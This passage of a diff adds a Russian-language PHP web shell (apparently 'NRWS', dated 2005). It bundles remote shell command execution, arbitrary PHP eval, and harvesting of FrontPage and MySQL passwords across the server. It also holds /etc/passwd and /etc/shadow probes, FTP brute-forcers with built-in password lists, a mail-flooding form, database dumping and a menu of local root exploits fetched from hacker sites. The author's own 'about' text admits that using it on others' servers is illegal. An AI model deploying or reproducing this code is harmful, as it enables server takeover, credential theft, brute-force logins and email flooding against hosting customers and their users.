+while(!feof($socket)) $buffer.=fread($socket, 1024); +$file_size=strlen($buffer); +$f=fopen($loadnewname,"wb+"); +fwrite($f, $buffer, $file_size); +echo "Ðàçìåð çàãðóæåííîãî ôàéëà: $file_size

    " ; +} + +if (!empty($_GET['ac'])) {$ac = $_GET['ac'];} +elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];} +else {$ac = "navigation";} + + + +switch($ac) { + +// Shell +case "shell": +echo ""; + +/* command execute */ +if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; } + +if (($_POST['alias']) AND ($_POST['alias']!=="")) + { + foreach ($aliases as $alias_name=>$alias_cmd) { + if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;} + } + } + + +echo "Âûïîëíåííàÿ êîìàíäà: ".$_POST['cmd'].""; +echo ""; +echo "
    "; +echo "
    "; +?> + + +
    :: Âûïîëíåíèå êîìàíä íà ñåðâåðå ::
    + + +
    + | cd | + | cat | + echo | + wget | + rm | + mysqldump | + who | + ps -ax | + cp | + pwd | + perl | + gcc | + locate | + find | + ls -lad | +
    + + +"; + +echo "Âûïîëíèòü êîìàíäó"; +echo "
    "; +echo "Ðàáî÷àÿ äèðåêòîðèÿ  "; +if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } +else { echo ""; } +echo ""; + +echo ""; + +/* aliases form */ +echo "
    "; +echo ""; +echo "         Âûáåðèòå àëèàñ    "; +echo ""; +if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } +else { echo ""; } +echo "  "; +echo ""; +echo "
    "; + + +break; +case "art": +echo "FrontPage Exploit by Nitrex
    +Ýêñïëîéò äëÿ FrontPage. Ñîáèðàåò ÷èòàåìûå .htpassword ôàéëû ïî âñåìó ñåðâåðó. Ïîçâîëÿåò ñîçäàòü íåõèëóþ áàçó âñåõ ñàéòîâ â âèäå ëîãèí:ïàðîëü îò õîñòåðà, òî åñòü ïàðîëè ê FrontPage ïîäõîäÿò ê FTP è äðóãèì ñåðâèñàì ñåðâåðà. Ðàññøèôðîâêà ïðîèçâîäèòñÿ ñ ïîìîùüþ John The Ripper (Standart/DES).

    +MySQL Find Config Exploit by DreAmeRz
    +Ýêñïëîèò, ïîçâîëÿþùèé îáëåã÷èòü ïîèñê ïàðîëåé ê áàçå äàííûõ. Ïðîèçâîäèòñÿ ïîèñê ôàéëîâ ñ óïîìèíàíèåì ðÿäà ñòðîê, óêàçûâàþùèõ íà êîííåêò ê MySQL. Òàêæå âîçìîæíî ñîâïàäåíèå ïàðîëåé ñ äðóãèìè ñåðâèñàìè ñåðâåðà. Ïàðîëè â áîëüøåíñòâå ñëó÷àåâ èëè âîâñå íå çàøèôðîâàíû, èëè çàøèôðîâàíû îáðàòèìûì àëãîðèòìîì. Ïðîàíàëèçèðîâàâ ôàéëû, óêàçàííûå ýêñïëîèòîì, âû áûñòðî íàéäåòå ïàðîëü ê MySQL.

    +FTP Brut by xoce
    +Ïîëíîöåííûé áðóòôîðñåð, ðàáîòàþùèé ïî ìåòîäó ïîäñòàíîâêè ïàðîëåé, êîòîðûå áåðåò èç ôàéëà. Ôàéë ãåíåðèðóåòñÿ ñàì, âû òîëüêî óêàçûâàåòå ÷èñëî ïàðîëåé è... âñå - ïåðåáîð íà÷èíàåòñÿ!!! Ñ ïîìîùüþ äàííîãî áðóòôîðñåðà âû ñìîæåòå ïîäîáðàòü ïàðîëü ê ëþáîìó õîñòèíãó áåç ïðîáëåì! ×òîáû áûëî ÷òî ïåðåáèðàòü, áûëà äîáàâëåíà áàçà ïàðîëåé, êîòîðàÿ ãåíåðèðóåòñÿ íà ëåòó (íå ïèøèòå áîëüøèå öèôðû â êîëè÷åñòâå ïàðîëåé, òàê êàê ýòî ñåðüåçíàÿ íàãðóçêà íà ñåðâåð! 10000 âïîëíå õâàòèò).

    +FTP login:login Brut by Terabyte
    +Ýêñïëîèò ïîçâîëÿåò ïåðåáðàòü àêêàóíò íà FTP íà ñâÿçêó login:login. ×åì áîëüøå þçåðîâ â /etc/passwd, òåì áîëüøå âåðîÿòíîñòü óäà÷íîé ðàáîòû ýêñïëîèòà.

    +Íåêîòîðûå äðóãèå ìèíè-ýêñïëîèòû ïðèâåäåíû çäåñü â àëüÿñàõ.
    "; +break; +case "frontpage": +$p=getenv("DOCUMENT_ROOT"); +if(exec("cat /etc/passwd")){ +$ex=explode("/", $p); +$do_login=substr($p,0,strpos($p,$ex[2])); +$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2])); +exec("cat /etc/passwd", $passwd); +for($i=0; $i<=count($passwd); $i++) { +$xz=explode(":", $passwd[$i]); +$file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd"; +if(exec("cat ".$file)){ +exec("cat ".$file,$open); +$a=$open[count($open)-1]; +$fr=strpos($a, ":"); +$open1=substr($a, $fr); +if($xz[4]=='') { +$file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess"; +Unset($domain); +exec("cat ".$file1,$domain); +$domain1=explode(" ",$domain[8]); +$xz[4]=$domain1[1]; +} +echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."
    "; +} } +} +elseif(is_file("/etc/passwd")){ +$ex=explode("/", $p); +$passwd="/etc/passwd"; +echo "Ïóòü: ".$p."
    "; +$do_login=substr($p,0,strpos($p,$ex[2])); +$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2])); +if(is_file($passwd)) { +$open=fopen($passwd,"r"); +while (!feof($open)) { +$str=fgets($open, 100); +$mas=explode(":", $str); +$file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd"; +if(is_file($file)) { +echo $mas[0]; +$open1=fopen($file, "r"); +$str1=fread($open1,filesize($file)); +fclose($open1); +$fr=strpos($str1, ":"); +$str2=substr($str1, $fr); +$str2=rtrim($str2); +// +if($mas[4]=='') { +$file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess"; +$open2=fopen($file1,"r"); +$domain=fread($open2,filesize($file1)); +fclose($open2); +$domain1=substr($domain,106,110); +$domain2=explode("AuthUserFile",$domain1); +$mas[4]=$domain2[0]; +} +// +echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."
    "; +} +} +fclose($open); +} +} +else{ +echo "Ñ ïàññîì îáëîì :((("; +} +break; +case "dbexploit": +echo "
    ";
    +echo "Â ôàéëå ïðèñóòñòâóåò ôóíêöèÿ mysql_connect: 
    "; +exec("find / -name *.php | xargs grep -li mysql_connect"); +exec("find / -name *.inc | xargs grep -li mysql_connect"); +exec("find / -name *.inc.php | xargs grep -li mysql_connect"); +echo "Â ôàéëå ïðèñóòñòâóåò ôóíêöèÿ mysql_select_db:
    "; +exec("find / -name *.php | xargs grep -li mysql_select_db"); +exec("find / -name *.inc | xargs grep -li mysql_select_db"); +exec("find / -name *.inc.php | xargs grep -li mysql_select_db"); +echo "Â ôàéëå ïðèñóòñòâóåò óïîìèíàíèå ïàðîëÿ:
    "; +exec("find / -name *.php | xargs grep -li $password"); +exec("find / -name *.inc | xargs grep -li $password"); +exec("find / -name *.inc.php | xargs grep -li $password"); +exec("find / -name *.php | xargs grep -li $pass"); +exec("find / -name *.inc | xargs grep -li $pass"); +exec("find / -name *.inc.php | xargs grep -li $pass"); +echo "Â ôàéëå ïðèñóòñòâóåò ñëîâî localhost:
    "; +exec("find / -name *.php | xargs grep -li localhost"); +exec("find / -name *.inc | xargs grep -li localhost"); +exec("find / -name *.inc.php | xargs grep -li localhost"); +echo "
    "; +break; +// ñïèñîê ïðîöåññîâ +case "ps": +echo "Ïðîöåññû â ñèñòåìå:
    "; + + echo "
    "; + if ($pid) + { + if (!$sig) {$sig = 9;} + echo "Îòïðàâëåíèå êîìàíäû ".$sig." to #".$pid."... "; + $ret = posix_kill($pid,$sig); + if ($ret) {echo "Âñå, ïðîöåññ óáèò, àìèíü";} + else {echo "ÎØÈÁÊÀ! ".htmlspecialchars($sig).", â ïðîöåññå #".htmlspecialchars($pid).".";} + } + $ret = `ps -aux`; + if (!$ret) {echo "Íåâîçìîæíî îòîáðàçèòü ñïèñîê ïðîöåññîâ! Âèäíî, çëîé àäìèí çàïðåòèë ps";} + else + { + $ret = htmlspecialchars($ret); + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;} + if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;} + $k = $ps_aux_sort[0]; + if ($ps_aux_sort[1] != "a") {$y = "";} + else {$y = "";} + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10,count($line))); + $line = array_slice($line,0,11); + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + $head[$k] = "".$head[$k]."".$y; + $head[] = "ACTION"; + $v = $ps_aux_sort[0]; + usort($prcs,"tabsort"); + if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo ""; + foreach($tab as $k) + { + echo ""; + foreach($k as $v) {echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } +break; +// exploits for root... +case "exploits": +// thanks to xoce +$public_site = "http://hackru.info/adm/exploits/public_exploits"; +$private_site = "http://hackru.info/adm/exploits/private_exploits"; +echo"Ýòîò ðàçäåë ñîçäàí ïî ðÿäó ïðè÷èí. Âî-ïåðâûõ, óæå íàäîåëî èñêàòü îäíè è òåæå ýêñïëîèòû, âî-âòîðûõ - êîìïèëèðîâàíèå è èñïðàâëåíèå ñîðöîâ ïîä êîíêðåòíóþ ïëàòôîðìó óæå òîæå íå ïðèíîñèò óäîâîëüñòâèÿ. Âñå ýêñïëîèòû ñêîìïèëèðîâàíû è íàñòðîåíû. Ñàìîìó êîìïèëèðîâàòü áûëî âëîì, ïîýòîìó âîñïîëüçîâàëñÿ ãîòîâûìè :) Âûðàæàþ áëàãîäàðíîñòü xoce (hackru.info)

    +Local ROOT for linux 2.6.20 - mremap (./m)
    +Local ROOT for linux 2.6.20 - ptrace (./p)
    +BRK - Local Root Unix 2.4.*(./brk)
    +Traceroute v1.4a5 exploit by sorbo (./sortrace)
    +Local Root Unix 2.4.* (./root)
    +Sendmail 8.11.x exploit localroot (./sxp)
    +Local Root Unix 2.4.* (./ptrace_kmod)
    +Local Root Unix 2.4.* (./mr1_a)

    "; +echo "Èñïîëüçîâàíèå: çàõîäèòå â /tmp èç bash øåëëà è çàïóñêàéòå ôàéëû çàïóñêà.
    +Ïðèìåð: cd /tmp; ./m - âñå, ýêñïëîèò çàïóñòèòñÿ, è åñëè âñå ok, òî âû ïîëó÷èòå ïðàâà root'a!
    +Åñëè çäåñü íå îêàçàëîñü ïîäõîäÿùåãî ýêñïëîèòà, òî ïîñåòèòå www.web-hack.ru/exploits/ è security.nnov.ru."; + +break; +case "damp": + + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ + $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + + if(@mysql_select_db($_POST['mysql_db'],$db)) + { + // èíôà î äàìïå + $sql1 = "# MySQL dump created by NRWS\r\n"; + $sql1 .= "# homepage: http://www.Ru24-Team.NET\r\n"; + $sql1 .= "# ---------------------------------\r\n"; + $sql1 .= "# date : ".date ("j F Y g:i")."\r\n"; + $sql1 .= "# database : ".$_POST['mysql_db']."\r\n"; + $sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + + // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû + $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); + $row = @mysql_fetch_row($res); + $sql1 .= $row[1]."\r\n\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + + $sql2 = ''; + + // ïîëó÷àåì äàííûå òàáëèöû + $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); + if (@mysql_num_rows($res) > 0) { + while ($row = @mysql_fetch_assoc($res)) { + $keys = @implode("`, `", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + echo "
    Ãîòîâî! Äàìï ïðîøåë óäà÷íî!
    "; + // ïèøåì â ôàéë èëè âûâîäèì â áðàóçåð + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } // end if(@mysql_select_db($_POST['mysql_db'],$db)) + + else echo "Òàêîé ÁÄ íåò!"; + @mysql_close($db); + } // end if($db) + else echo "Íåò êîííåêòà c ñåðâåðîì!"; + } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){ + else if(!empty($_POST['dif'])&&!$fp) { echo "ÎØÈÁÊÀ, íåò ïðàâ çàïèñè â ôàéë!"; } + +break; +// SQL Attack +case "sql": +echo "
    "; +echo " Áàçà:  "; +echo " Òàáëèöà:  "; +echo " Ëîãèí:  "; +echo " Ïàðîëü:  "; +echo ""; +echo ""; +echo "
     Ñîõðàíèòü äàìï â ôàéëå: "; +echo "" ; +echo ""; +echo "
    "; + print ""; +### + +@$php_self=$_GET['PHP_SELF']; +@$from=$_GET['from']; +@$to=$_GET['to']; +@$adress=$_POST['adress']; +@$port=$_POST['port']; +@$login=$_POST['login']; +@$pass=$_POST['pass']; +@$adress=$_GET['adress']; +@$port=$_GET['port']; +@$login=$_GET['login']; +@$pass=$_GET['pass']; +if(!isset($adress)){$adress="localhost";} +if(!isset($login)){$login="root";} +if(!isset($pass)){$pass="";} +if(!isset($port)){$port="3306";} +if(!isset($from)){$from=0;} +if(!isset($to)){$to=50;} +?> + + + +
    + + + + + + +
    + +
    Õîñò:
    Ïîðò:
    Ëîãèí:
    Ïàðîëü: +
    PHP v".@phpversion()."
    mySQL v".@mysql_get_server_info()."
    ";}?>
    +
    +
    +Âûéòè èç áàçû";}else{$status="Îòêëþ÷åí.";} +print "Ñòàòóñ: $status

    "; +print "
    "; +print "[Òàáëèöû]
    "; +$res = mysql_list_dbs($serv); +while ($str=mysql_fetch_row($res)){ +print "$str[0]
    "; +@$tc++; +} +$pro="                                                     "; +@$base=$_GET['base']; +@$db=$_GET['db']; +print "[Âñåãî òàáëèö: $tc]
    $pro"; +if($base){ +print "
    Òàáëèöà: [$tbl]

    "; +$result=mysql_list_tables($db); +while($str=mysql_fetch_array($result)){ +$c=mysql_query ("SELECT COUNT(*) FROM $str[0]"); +$records=mysql_fetch_array($c); +print "[$records[0]] $str[0]
    "; +mysql_free_result($c); +} +} #end base + +@$vn=$_GET['vn']; +print "
    "; +print "Áàçà äàííûõ: $db => $vn"; +@$inside=$_GET['inside']; +@$tbl=$_GET['tbl']; +if($inside){ +print ""; + +mysql_select_db($db) or die(mysql_error()); +$c=mysql_query ("SELECT COUNT(*) FROM $tbl"); +$cfa=mysql_fetch_array($c); +mysql_free_result($c); +print "                                                       
    "; +print " +Âñåãî: $cfa[0] + +Îò: +Äî: + + + + + + + + + + + + [Çàãðóçèòü] +"; +@$vn=$_GET['vn']; +@$from=$_GET['from']; +@$to=$_GET['to']; +@$from=$_GET['from']; +@$to=$_GET['to']; +if(!isset($from)){$from=0;} +if(!isset($to)){$to=50;} +$query = "SELECT * FROM $vn LIMIT $from,$to"; +$result = mysql_query($query); +for ($i=0;$i  "; +} +print ""; +while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){ +print ""; +foreach ($mn as $come=>$lee) { +$nst_inside=htmlspecialchars($lee); +print "\r\n"; +} print ""; +} +mysql_free_result($result); +print "
    $name
     $nst_inside
    "; + +} #end inside +print "
    "; +} # end $conn + + +### end of sql +print "
    "; +print $copyr; +die; + + +break; + +//PHP Eval Code execution +case "eval": + +echo <<Èñïîëíåíèå php-êîäà (áåç "< ? ? >")
    + + + + + + + + +$tend +HTML; + +if (isset($_POST['ephp'])){ +eval($_POST['ephp']); +} +break; + +// SEND MAIL +case "sendmail": +echo << + + +Îò êîãî:
    + +
    Êîìó:
    +
    Òåìà:
    +
    Òåêñò:
    + + + + +$tend +HTML; +// íèêàêàÿ ïðîâåðêà íå äåëàåòñÿ, à çà÷åì ? =) +if (isset($submit)) +{ + +mail($tomailz,$mailtema,$mailtext,"From: $frommail"); +echo "

    Ñîîáùåíèå îòïðàâëåíî!

    "; +} +break; + + +// Èíôîðìàöèÿ î ñèñòåìå +case "info": +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "Âêëþ÷åíî"; +} +else {$safemode = false; $hsafemode = "Îòêëþ÷åíî";} +/* display information */ +echo "[ Èíôîðìàöèÿ î ñèñòåìå ]
    "; +echo "Õîñò: ".$_SERVER["HTTP_HOST"]."
    " ; +echo "IP ñåðâåðà: ".gethostbyname($_SERVER["HTTP_HOST"])."
    "; +echo " Ñåðâåð: ".$_SERVER['SERVER_SIGNATURE']." "; +echo "OC: ".exec("uname -a")."("; +print "".php_uname()." )
    \n"; +echo "Ïðîöåññîð: ".exec("cat /proc/cpuinfo | grep GHz")."
    "; +echo "Ïðèâèëåãèè: ".exec("id")."
    "; +echo "Âñåãî ìåñòà: " . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "Ñâîáîäíî: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB
    "; +echo "Òåêóùèé êàòàëîã:".exec("pwd").""; +echo "
    Òåêóøèé web-ïóòü: ".@$_SERVER['PHP_SELF']." "; +echo "
    Òâîé IP: ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
    "; +echo "PHP version: ".phpversion()."
    "; +echo " ID âëàäåëüöà ïðîöåñà: ".get_current_user()."
    "; +echo "MySQL : ".mysql_get_server_info()."
    "; +if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){ +print 'Åñòü äîñòóï ê /etc/passwd!
    '; +} +if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){ +print 'Åñòü äîñòóï ê /etc/shadow!
    '; +} +if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){ +print 'Åñòü äîñòóï ê /etc/shadow-! '; +} +if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){ +print 'Åñòü äîñòóï ê /etc/master.passwd!
    '; +} +if(isset($_POST['th']) && $_POST['th']!=''){ +chdir($_POST['th']); +}; +if(is_writable('/tmp/')){ +$fp=fopen('/tmp/qq8',"w+"); +fclose($fp); +print "/tmp - îòêðûòà 
    \n"; +unlink('/tmp/qq8'); +} +else{ +print "/tmp - íå îòêðûòà
    "; +} +echo "Áåçîïàñíûé ðåæèì: ".$hsafemode."
    "; +if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + $num = $nixpasswd + $nixpwdperpage; + echo "*nix /etc/passwd:
    "; + $i = $nixpasswd; + while ($i < $num) + { + $uid = posix_getpwuid($i); + if ($uid) {echo join(":",$uid)."
    ";} + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
    ";} + { echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "cpanel log
    ";} + break; + +// Î ñêðèïòå +case "about": + +echo "
    Ïðèâåò âñåì!

    +Íàêîíåö-òî NWRS äîñòóïåí â ïåðâîé ñòàáèëüíîé âåðñèè! Äîáàâèëîñü ìíîæåñòâî íîâûõ ïîëåçíûõ âîçìîæíîñòåé. Âñå ôóíêöèè ñêðèïòà ðàáîòàþò è ðàáîòàþò êîððåêòíî. Äîáàâëåíû óíèêàëüíûå èíñòðóìåíòû äëÿ âçëîìà ñåðâåðà.  òî æå âðåìÿ íåò íè÷åãî ëèøíåãî. Âñå, ÷òî çàäóìûâàëîñü - ðåàëèçèðîâàíî. Äóìàþ, êàæäûé íàéäåò â ñêðèïòå ÷òî-òî ïîëåçíîå äëÿ ñåáÿ. Òàêæå çàÿâëÿþ î òîì, ÷òî ÿ çàêðûâàþ ïðîåêò, èáî îí äîñòèã èäåàëà :) Ëþáîé ìîæåò åãî ïðîäîëæèòü, php - îòêðûòûé ÿçûê. Íà ïåðâûõ ïîðàõ ñêðèïò âîîáùå áûë òîëüêî ó íåñêîëüêèõ ÷åëîâåê óçêîãî êðóãà äðóçåé, ïèñàë åãî äëÿ ñåáÿ, èç-çà ñâîåé ïðèðîäíîé ëåíè. +Íó, è ñïàñèáî ýòèì ëþäÿì: Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (îðôîãðàôèÿ è äèçàéí)... È ìíîãèì äðóãèì... Èõ èäåè î÷åíü ïîìîãëè âîïëîòèòü â æèçíü ñòîëü óíèâåðñàëüíûé èíñòðóìåíò. Îãðîìíîå ñïàñèáî èì!

    Ïîìíèòå: èñïîëüçóÿ ýòîò ñêðèïò íà ÷óæèõ ñåðâåðàõ, âû íàðóøàåòå çàêîí :) Òàê ÷òî îñòîðîæíåå.
    "; +echo "


    Ïîñåòèòå ýòè ñàéòû, è âû âñåãäà áóäåòå â êóðñå ñîáûòèé:

    +www.ru24-team.net

    +www.web-hack.ru

    +www.rst.void.ru

    +www.hackru.info

    +www.realcoding.net

    +www.ccteam.ru

    +Èçâèíÿþñü, åñëè êîãî çàáûë.
    Àâòîð íå íåñåò îòâåòñòâåííîñòè çà ìàòåðèàëû, ðàçìåùåííûå íà ýòèõ ñàéòàõ, îcîáåííî íà ïîñëåäíåì :) +




    Ñêðèïò ðàñïðîñòðàíÿåòñÿ ïî ëèöåíçèè GNU GPL
    22 Èþëÿ 2005 ã. © DreAmeRz
    e-mail:
    dreamerz@mail.ru ICQ: 817312 WEB: http://www.Ru24-Team.NET"; +break; + +// ÔÒÏ ïîäáîð ïàðîëåé +case "ftppass": + +$filename="/etc/passwd"; // passwd file +$ftp_server="localhost"; // FTP-server + +echo "FTP-server: $ftp_server

    "; + +$fp = fopen ($filename, "r"); +if ($fp) +{ +while (!feof ($fp)) { +$buf = fgets($fp, 100); +ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); +$ftp_user_name=$g[1]; +$ftp_user_pass=$g[1]; +$conn_id=ftp_connect($ftp_server); +$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass); + +if (($conn_id) && ($login_result)) { +echo "Ïîäêëþ÷åíèå login:password - ".$ftp_user_name.":".$ftp_user_name."
    "; +ftp_close($conn_id);} +else { +echo $ftp_user_name." - error
    "; +} +}} +break; + +case "ftp": + +echo " +
    + + + + + + + + + + + + + +
    + Ïðîâåðèòü íà ñâÿçêó login\password +
      FTP Host:    +
      Login:    +
      Êîëëè÷åñòâî ïàðîëåé:    + <1000 pass
      Ïàðîëü äëÿ ïðîâåðêè:    + +
    Ëîã ñîõðàíÿåòñÿ â pass.txt
    "; + + +function s() { + $word="qwrtypsdfghjklzxcvbnm"; + return $word[mt_rand(0,strlen($word)-1)]; +} + +function g() { + $word="euioam"; + return $word[mt_rand(0,strlen($word)-2)]; +} + +function name0() { return s().g().s(); } +function name1() { return s().g().s().g(); } +function name2() { return s().g().g().s(); } +function name3() { return s().s().g().s().g(); } +function name4() { return g().s().g().s().g(); } +function name5() { return g().g().s().g().s(); } +function name6() { return g().s().s().g().s(); } +function name7() { return s().g().g().s().g(); } +function name8() { return s().g().s().g().g(); } +function name9() { return s().g().s().g().s().g(); } +function name10() { return s().g().s().s().g().s().s(); } +function name11() { return s().g().s().s().g().s().s().g(); } + +$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005); +$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker'); + +function randword() { + global $cool; + $func="name".mt_rand(0,11); + $func2="name".mt_rand(0,11); + switch (mt_rand(0,11)) { + case 0: return $func().mt_rand(5,99); + case 1: return $func()."-".$func2(); + case 2: return $func().$cool[mt_rand(0,count($cool)-1)]; + case 3: return $func()."!".$func(); + case 4: return randpass(mt_rand(5,12)); + default: return $func(); + } + + +} + +function randpass($len) { + $word="qwertyuiopasdfghjklzxcvbnm1234567890"; + $s=""; + for ($i=0; $i<$len; $i++) { + $s.=$word[mt_rand(0,strlen($word)-1)]; + } + return $s; +} +if (@unlink("pass.txt") < 0){ +echo "íè÷åãî íåò"; +exit; +} +$file="pass.txt"; +if($file && $host && $login){ + $cn=mt_rand(30,30); +for ($i=0; $i<$cn; $i++) { + $s=$cool2[$i]; + $f=@fopen(pass.".txt","a+"); + fputs($f,"$s\n"); + } + + $cnt2=mt_rand(43,43); +for ($i=0; $i<$cnt2; $i++) { + $r=$cool[$i]; + $f=@fopen(pass.".txt","a+"); + fputs($f,"$login$r\n"); +} +$p="$testing"; + $f=@fopen(pass.".txt","a+"); + fputs($f,"$p\n"); + + $cnt3=mt_rand($number,$number); + for ($i=0; $i<$cnt3; $i++) { + $u=randword(); + $f=@fopen(pass.".txt","a+"); + fputs($f,"$u\n"); + } + + if(is_file($file)){ + $passwd=file($file,1000); + for($i=0; $i +Ïîçäðàâëÿþ!!! Ïàðîëü ïîäîáðàí.
    +  Êîííåêò: $host
      Ëîãèí: $login
      Ïàðîëü: $password +";exit; + } + elseif(preg_match("/530/",$text)){ + $stop=true; + + } + } + fclose($open_ftp); + }else{ + echo " + + +
    Íåâåðíî óêàçàí ftp õîñòèíãà!!! Íà $host çàêðûò 21 ïîðò!
    +";exit; + } + } + } +} + + +break; +// SQL Attack +case "sql": + +break; + + + + + + +// MailFlud +case "mailfluder": + +$email=$_POST['email']; // Ìûëî æåðòâû +$from=$_POST['from']; // Ìûëî æåðòâû +$num=$_POST['num']; // ×èñëî ïèñåì +$text=$_POST['text']; // Òåêñò ôëóäà +$kb=$_POST['kb']; // Âåñ ïèñüìà (kb) +?> + +Æåðòâà: $email
    +Êîë-âî ïèñåì: $num
    +Îáùèé ïîñëàííûé îáúåì: $all_kb kb

    +EOF; + +} + +else { + +echo << + + + + + + + +
    Ìûëî æåðòâû
    Îò ëèïîâîãî ìûëà
    ×èñëî ïèñåì
    Òåêñò ôëóäà
    Âåñ ïèñüìà (KB)
      
    + +EOF; + +} +break; + +case "tar": +# àðõèâàöèÿ äèðåêòîðèè +$fullpath = $d."/".$tar; +/* çàäàåì ñëó÷àéíûå èìåíà ôàéëîâ àðõèâàöèè*/ +$CHARS = "abcdefghijklmnopqrstuvwxyz"; +for ($i=0; $i<6; $i++) $charsname .= $CHARS[rand(0,strlen($CHARS)-1)]; + echo "
    +Êàòàëîã $fullpath ".exec("tar -zc $fullpath -f $charsname.tar.gz")."óïàêîâàí â ôàéë $charsname.tar.gz"; + + + +echo " + +
    +Àðõèâàöèÿ $name.tar.gz: + + + +
    "; + +exec($archive); + +break; + + +// Íàâèãàöèÿ +case "navigation": + + // Ïîøëà íàâèãàöèÿ +$mymenu = " [Ïðîñìîòð ] [Óäàëèòü] [Ðåäàêòèðîâàòü] [Î÷èñòèòü] [Çàìåíèòü òåêñò] [Çàãðóçèòü]
    "; +if(@$_GET['download']){ +@$download=$_GET['download']; +@$d=$_GET['d']; +header("Content-disposition: attachment; filename=\"$download\";"); +readfile("$d/$download"); +exit;} +$images=array(".gif",".jpg",".png",".bmp",".jpeg"); +$whereme=getcwd(); +@$d=@$_GET['d']; +$copyr = "
    "; +$php_self=@$_SERVER['PHP_SELF']; +if(@eregi("/",$whereme)){$os="unix";}else{$os="win";} +if(!isset($d)){$d=$whereme;} +$d=str_replace("\\","/",$d); + + + +$expl=explode("/",$d); +$coun=count($expl); +if($os=="unix"){echo "/";} +else{ + echo "$expl[0]/";} +for($i=1; $i<$coun; $i++){ + @$xx.=$expl[$i]."/"; +$sls="$expl[$i]/"; +$sls=str_replace("//","/",$sls); +$sls=str_replace("/'>/","/'>",$sls); +print $sls; +} +echo ""; +//if($os=="unix"){ echo " +//id: ".@exec('id')." +//uname -a: ".@exec('uname -a')."";} +if(@$_GET['delfl']){ +@$delfolder=$_GET['delfolder']; +echo "DELETE FOLDER: ".@$_GET['delfolder']."
    +(All files must be writable)
    +Yes || No

